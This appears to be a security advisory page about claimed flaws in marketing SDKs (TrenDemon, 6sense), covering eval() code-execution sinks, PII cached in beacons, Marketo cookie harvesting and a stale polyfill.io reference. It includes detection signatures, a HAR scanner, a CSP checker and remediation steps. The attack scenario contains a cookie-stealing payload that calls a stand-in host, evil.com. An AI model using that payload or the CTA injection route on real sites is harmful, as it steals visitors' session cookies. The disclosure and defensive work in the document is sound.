ZEROSENSE+DEMONSCRIPT
The TrenDemon Zero-Day Stack
We found five zero-day vulnerabilities in the B2B marketing stack by visiting a privacy policy page with a HAR recorder. We were deanonymized while the page loaded from a compromised supply chain.
"I just got deanonymized reading a privacy policy, while the page loaded code from a CDN compromised by a Chinese acquisition 18 months ago."
- Discovery moment, 2025-12-04
ZERO_DAY_REGISTRY
ZeroSense
CRITICAL
BTI-2025-0023-A
6sense beacon re-transmits ENTIRE Epsilon deanonymization response (phone, address) to ALL 6sense customers via cached q.metadata.ores parameter. Visitors permanently deanonymized for 760 days.
DemonScript
CRITICAL
BTI-2025-0025-A
Any TrenDemon customer can execute arbitrary JavaScript in visitor browsers via CTA configuration. 6 distinct eval() vectors in trends.min.js.
RollCredits
CRITICAL
BTI-2025-0025-B
Video players (Wistia, Brightcove, Vidyard) weaponized as execution triggers. Video completion events fire eval(postCompletionScript). Marketing funnel = kill chain.
MaCook'd
HIGH
BTI-2025-0025-C
TrenDemon harvests Marketo _mkto_trk cookie via btoa(this.context.maCookie), exfiltrates to trackingapi.trendemon.com on form submission.
PollyWannaCrack
CRITICAL
BTI-2025-0025-D
TrenDemon SDK still references polyfill.io - domain compromised by Funnull CDN in June 2024. Older browsers (IE11, Safari <9) load malware. Function misspelled as 'loadPollyills'.
DEMONSCRIPT // EVAL() ARBITRARY CODE EXECUTION
Any Customer Can Run Code on Your Visitors
TrenDemon's SDK contains 6 distinct eval() code execution vectors. Any TrenDemon customer (or attacker with CTA access) can execute arbitrary JavaScript in visitor browsers through their dashboard configuration.
ATTACK SCENARIO: Create TrenDemon account → Configure CTA with fetch('https://evil.com/'+document.cookie) → Deploy on target site → Every visitor clicking CTA executes attacker code.
$Trd_Utils.sendGa4Tracking = function(ctaParams, event, page) {
  var trackingCodeToEval;
  // Both fields come straight from the customer's CTA configuration
  switch(event) {
    case "load":
      trackingCodeToEval = ctaParams.CustomImpressionTrackingCode;
      break;
    case "click":
      trackingCodeToEval = ctaParams.CustomClickTrackingCode;
      break;
  }
  return (null == trackingCodeToEval ? void 0 : trackingCodeToEval.length)
    ? eval(trackingCodeToEval) // <-- ARBITRARY CODE EXECUTION
    : dataLayer.push({...})
}
POLLYWANNACRACK // POLYFILL.IO SUPPLY CHAIN
t.prototype.loadPollyills = function (t) { // Note: MISSPELLED
  if (Array.prototype.findIndex) t(); // Modern browser - skip
  else {
    var e = document.createElement("script");
    e.src = "https://polyfill.io/v3/polyfill.min.js?features=...";
    // LOADS FROM COMPROMISED DOMAIN ON OLDER BROWSERS
  }
};
Compromised Supply Chain, Misspelled Function
In June 2024, polyfill.io was acquired by Funnull CDN and began injecting malware into 100,000+ websites. TrenDemon's production code STILL references the compromised domain 18 months later.
Fires when Array.prototype.findIndex is unavailable (IE11, Safari <9, older mobile browsers).
Function misspelled as loadPollyills instead of loadPolyfills. This code hasn't been reviewed since it was written.
ZEROSENSE // CROSS-CUSTOMER PII CACHE
Your Phone Number, Cached for 760 Days
6sense beacon re-transmits the ENTIRE Epsilon deanonymization response (including phone, address) in the q.metadata.ores parameter. Any site running 6sense can retrieve this cached PII.
Once 6sense deanonymizes you on ANY website, your company info (phone, address, company name) is cached and available to ALL 6sense customers for 760 days without hitting the Epsilon data broker again.
// HAR line 74639 - Beacon re-exfiltrates ENTIRE Epsilon response
GET /v1/beacon/img.gif?
  q.metadata.ores={"company":"Ronin","phone":"[REDACTED]","address":"[REDACTED]"}
  &6suuid=0868dc17054b1100573f016922000000304d0200
  &company_id=24deccd977193c4
// ANY 6sense customer can retrieve this cached PII for 760 days
ROLLCREDITS // VIDEO COMPLETION = CODE EXECUTION
The Marketing Funnel IS the Kill Chain
Video players (Wistia, Brightcove, Vidyard) aren't just tracking engagement. They're execution triggers. When the video ends and the credits roll, eval(postCompletionScript) fires.
1. Video Loads
Wistia/Brightcove/Vidyard script injected via innerHTML. Visitor identity already captured.
2. User Watches
Maximum engagement achieved. User has invested time, trust at peak. Perfect social engineering moment.
3. Credits Roll
eval(postCompletionScript) executes. Video player was just a fancy setTimeout().
// Video completion triggers arbitrary code execution
if (this.model.videoScript && this.model.videoScript.length) {
  var _ = document.createElement("dummy");
  _.innerHTML = this.model.videoScript; // DOM injection
  Array.from(_.querySelectorAll("script"))
    .filter(function (t) { return t.src; })
    .forEach(function (t) {
      $Trd_Utils.isVideoScriptSourceValid(t.src) && // Wistia/Brightcove/Vidyard
        $Trd_Utils.loadJs(t.src, new Date().getTime().toString());
    });
}
// On video completion:
(_a.length) && eval(personal.postCompletionScript) // RCE
MACOOK'D // MARKETO COOKIE HARVESTING
Your Marketo Cookie, Base64'd and Gone
TrenDemon harvests Marketo's _mkto_trk cookie, Base64-encodes it as maCook, and exfiltrates it to trackingapi.trendemon.com on every form submission.
id:958-TTM-744&token:_mch-6sense.com-33fe35d4df8d6e33441925452a7b0e80
Cross-vendor cookie sharing without consent. Links Marketo identity to TrenDemon visitor graph.
// Line 4994-5003 - Marketo cookie exfiltration
this.context.maCookie &&
  (p.maCook = btoa(this.context.maCookie)); // Base64 encode stolen cookie
var g = "/api/experience/new-lead?" + params;
$Trd_Tools.JSONP(g, ...) // Exfiltrate to TrenDemon
DETECTION_SIGNATURES
# TrenDemon (CRITICAL)
||trackingapi.trendemon.com^
||assets.trendemon.com^
||trendemon.com^
# 6sense (CRITICAL)
||6sc.co^
||eps.6sc.co^
||b.6sc.co^
# polyfill.io (COMPROMISED)
||polyfill.io^
# TrenDemon SDK
"$Trd_Utils"
"$Trd_Tools"
"sendGa4Tracking"
"CustomClickTrackingCode"
"loadPollyills" // MISSPELLED
"postCompletionScript"
# Dangerous patterns
eval(trackingCodeToEval)
eval(actionScript)
eval(personal.postCompletionScript)
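The signatures above applied to a captured HAR, as an added example that is not part of the original advisory and is not TrenDemon's or 6sense's code. It assumes Node.js (for the URL and Buffer globals). The domain suffixes, SDK identifiers and eval() sinks are the ones listed on this page; the HAR entries are constructed to exercise each check (blocklisted host, PII in the q.metadata.ores beacon parameter, Base64 Marketo cookie in maCook, SDK markers, eval() sink and polyfill.io reference in a script body) and carry placeholder values. Findings are returned as objects so the scan can feed a SIEM rule rather than only print.

```javascript
// Added example: scan HAR entries for the indicators in DETECTION_SIGNATURES.
// Not vendor code; domain list and markers taken from the advisory text above.

const FLAGGED_HOST_SUFFIXES = [
  "trendemon.com", // TrenDemon (covers trackingapi., assets.)
  "6sc.co",        // 6sense (covers eps., b.)
  "polyfill.io",   // compromised CDN
];

// Identifiers from the TrenDemon SDK as listed above.
const SDK_MARKERS = ["$Trd_Utils", "$Trd_Tools", "sendGa4Tracking",
  "CustomClickTrackingCode", "loadPollyills", "postCompletionScript"];

// eval() sinks fed from customer-controlled configuration.
const EVAL_SINKS = /eval\((trackingCodeToEval|actionScript|personal\.postCompletionScript)\)/g;

function hostMatches(host, suffix) {
  return host === suffix || host.endsWith("." + suffix);
}

// Inspect one HAR entry and return zero or more findings.
function scanEntry(entry) {
  const findings = [];
  const url = new URL(entry.request.url);
  const host = url.hostname;

  for (const suffix of FLAGGED_HOST_SUFFIXES) {
    if (hostMatches(host, suffix)) findings.push({ kind: "flagged-host", host, suffix });
  }

  // ZeroSense: beacon carrying a deanonymization payload in q.metadata.ores
  const ores = url.searchParams.get("q.metadata.ores");
  if (ores) {
    try {
      const obj = JSON.parse(ores);
      const keys = ["phone", "address", "email", "company"].filter((k) => k in obj);
      if (keys.length) findings.push({ kind: "pii-in-beacon", host, keys });
    } catch (_) { /* not JSON: nothing to report */ }
  }

  // MaCook'd: Base64 Marketo cookie in the maCook parameter
  const maCook = url.searchParams.get("maCook");
  if (maCook) {
    const decoded = Buffer.from(maCook, "base64").toString("utf8");
    findings.push({ kind: "marketo-cookie-exfil", host, marketo: decoded.startsWith("id:") });
  }

  // Response body: SDK markers, eval() sinks, polyfill.io reference
  const body = (entry.response && entry.response.content && entry.response.content.text) || "";
  if (body) {
    const markers = SDK_MARKERS.filter((m) => body.includes(m));
    if (markers.length) findings.push({ kind: "sdk-marker", host, markers });
    const sinks = [...body.matchAll(EVAL_SINKS)].map((m) => m[0]);
    if (sinks.length) findings.push({ kind: "eval-sink", host, sinks });
    if (body.includes("polyfill.io")) findings.push({ kind: "polyfill-reference", host });
  }
  return findings;
}

function scanHar(har) {
  return har.log.entries.flatMap(scanEntry);
}

// CONSTRUCTED sample HAR with placeholder values; not a real capture.
const SAMPLE_HAR = { log: { entries: [
  { request: { url: "https://b.6sc.co/v1/beacon/img.gif?q.metadata.ores=" +
      encodeURIComponent('{"company":"ExampleCo","phone":"[REDACTED]","address":"[REDACTED]"}') },
    response: { content: {} } },
  { request: { url: "https://trackingapi.trendemon.com/api/experience/new-lead?maCook=" +
      encodeURIComponent(Buffer.from("id:000-AAA-000&token:_mch-example.com-0000", "utf8").toString("base64")) },
    response: { content: {} } },
  { request: { url: "https://assets.trendemon.com/trends.min.js" },
    response: { content: { text: "$Trd_Utils.sendGa4Tracking=function(){eval(trackingCodeToEval)};" +
      "t.prototype.loadPollyills=function(){e.src='https://polyfill.io/v3/polyfill.min.js'}" } } },
  { request: { url: "https://www.example.com/privacy" },
    response: { content: { text: "<html>" } } },
] } };

console.log(JSON.stringify(scanHar(SAMPLE_HAR), null, 2));
```

Point the same function at a real HAR (JSON.parse of the exported file) and the benign first-party page produces no findings while each vendor request is tagged by kind, which is what the HAR Analysis and Supply Chain Audit steps in the playbook below are looking for.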
REMEDIATION_PLAYBOOK
Website Owners
IMMEDIATE ACTION
1. Remove TrenDemon
Delete all TrenDemon script tags from your site. Check GTM containers.
2. Block at CDN/WAF
Add *.trendemon.com and polyfill.io to blocklist.
3. Audit 6sense Integration
Review what subprocessors 6sense deploys on your domain.
4. Review Marketo Cookies
Check if trd_ma_cookie exists. If so, your Marketo data was harvested.
5. Notify Legal/DPO
760-day cookies violate GDPR. Cross-vendor data sharing requires disclosure.
Security Teams
DETECTION & MONITORING
1. SIEM Rule: eval() in Marketing Tags
Alert on eval( calls from known marketing domains in CSP reports.
2. Network Monitor: TrenDemon API
Watch for trackingapi.trendemon.com outbound connections.
3. CSP Header Update
Remove 'unsafe-eval'. Block *.trendemon.com in script-src.
4. HAR Analysis
Capture HAR on your marketing pages. Search for $Trd_Utils or loadPollyills.
5. Supply Chain Audit
Grep all vendor scripts for polyfill.io references. Replace with cdnjs.
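A check for the two script-src changes in step 3, as an added example that is not part of the original advisory. It assumes Node.js (URL global). Both policies are constructed: the weak one is the common pattern that keeps 'unsafe-eval' and allows any https: host, the hardened one lists only the page origin and a placeholder CDN host. The matcher implements CSP host-source matching in simplified form (scheme sources, 'self', exact hosts and *.wildcards; no nonces, hashes or 'strict-dynamic').

```javascript
// Added example: evaluate whether a CSP still permits eval() and a given
// third-party script. Simplified matcher, not a full CSP implementation.

function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean).map((t) => t.toLowerCase());
    if (tokens.length) directives[tokens[0]] = tokens.slice(1);
  }
  return directives;
}

// Effective source list for scripts: script-src, falling back to default-src.
function scriptSources(directives) {
  return directives["script-src"] || directives["default-src"] || [];
}

function allowsEval(policy) {
  return scriptSources(parseCsp(policy)).includes("'unsafe-eval'");
}

// One source expression against one script URL.
function sourceMatches(source, scriptUrl, pageOrigin) {
  const u = new URL(scriptUrl);
  if (source === "'self'") return u.origin === pageOrigin.toLowerCase();
  if (source === "*") return true;
  if (source === "https:") return u.protocol === "https:";
  if (source === "http:") return u.protocol === "http:" || u.protocol === "https:";
  if (source.startsWith("'")) return false; // other keywords carry no host
  // Strip scheme, port and path; CSP host matching is on the host part.
  const host = source.replace(/^[a-z]+:\/\//, "").replace(/[:/].*$/, "");
  if (host.startsWith("*.")) return u.hostname.endsWith(host.slice(1));
  return u.hostname === host;
}

// CSP has no deny rule: a script loads only if some source expression matches.
function allowsScript(policy, scriptUrl, pageOrigin) {
  return scriptSources(parseCsp(policy)).some((s) => sourceMatches(s, scriptUrl, pageOrigin));
}

// CONSTRUCTED policies: weak setting beside the corrected one.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-eval' https:";
const HARDENED_CSP = "default-src 'self'; script-src 'self' https://cdn.example.com";

// Summary for one policy against the SDK host named in the playbook.
function review(policy, pageOrigin) {
  return {
    evalReachable: allowsEval(policy),
    trendemonLoads: allowsScript(policy, "https://assets.trendemon.com/trends.min.js", pageOrigin),
  };
}

console.log("weak:    ", review(WEAK_CSP, "https://www.example.com"));
console.log("hardened:", review(HARDENED_CSP, "https://www.example.com"));
```

The weak policy is instructive: a bare https: scheme source matches every TLS host, so *.trendemon.com is loadable without ever being named, and 'unsafe-eval' leaves eval(trackingCodeToEval) and eval(personal.postCompletionScript) working. Under the hardened policy the host is excluded simply by not being listed, and the browser refuses the eval() calls and reports them via report-uri/report-to, which is the signal the SIEM rule in step 1 keys on.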
Site Visitors
PERSONAL PROTECTION
1. Install uBlock Origin
Add custom filter: ||trendemon.com^
2. Clear TrenDemon Cookies
Delete all cookies matching trd_* pattern.
3. Clear localStorage
Remove trd_vid_l and trd_vuid_l keys.
4. Block 6sense Domains
Add *.6sc.co to your blocklist to prevent deanonymization.
5. Use Modern Browser
polyfill.io only fires on IE11/Safari <9. Modern browsers skip the compromised CDN.
Quick Remediation Commands
# uBlock Origin Custom Filters
||trendemon.com^
||trackingapi.trendemon.com^
||assets.trendemon.com^
||6sc.co^
||polyfill.io^
# Browser Console - Clear TrenDemon Data
// Clear cookies. split(";") leaves a leading space on each name, so trim it;
// a cookie is only removed when the expiring write uses the path it was set with.
document.cookie.split(";").forEach(c => {
  var name = c.split("=")[0].trim();
  if (name.startsWith("trd_"))
    document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT;path=/";
});
// Clear localStorage
Object.keys(localStorage)
  .filter(k => k.startsWith("trd_"))
  .forEach(k => localStorage.removeItem(k));
Five Zero-Days. One HAR File.
This is what we found by reading their privacy policy. Imagine what's running on YOUR site.